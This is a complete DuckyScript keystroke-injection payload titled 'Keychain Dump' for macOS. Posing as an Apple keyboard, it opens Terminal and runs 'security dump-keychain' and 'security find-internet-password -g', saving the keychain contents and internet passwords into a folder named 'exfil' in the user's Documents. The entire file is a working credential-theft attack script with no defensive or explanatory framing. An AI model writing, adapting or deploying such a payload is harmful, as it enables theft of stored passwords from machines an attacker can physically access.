REM Author: Generated
REM Title: Keychain Dump
REM Target: macOS
REM Version: 1.0
REM Category: Credentials
REM ---
DELAY 1000
REM Dump keychain passwords (triggers auth prompt for each)
REM Saves to ~/Documents/exfil/keychain.txt
REM ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING mkdir -p ~/Documents/exfil
ENTER
DELAY 500
STRING security dump-keychain > ~/Documents/exfil/keychain_dump.txt 2>&1
ENTER
DELAY 2000
STRING security find-internet-password -g > ~/Documents/exfil/keychain_passwords.txt 2>&1
ENTER
DELAY 1000
STRING ls -la ~/Documents/exfil/
ENTER
DELAY 500
GUI w
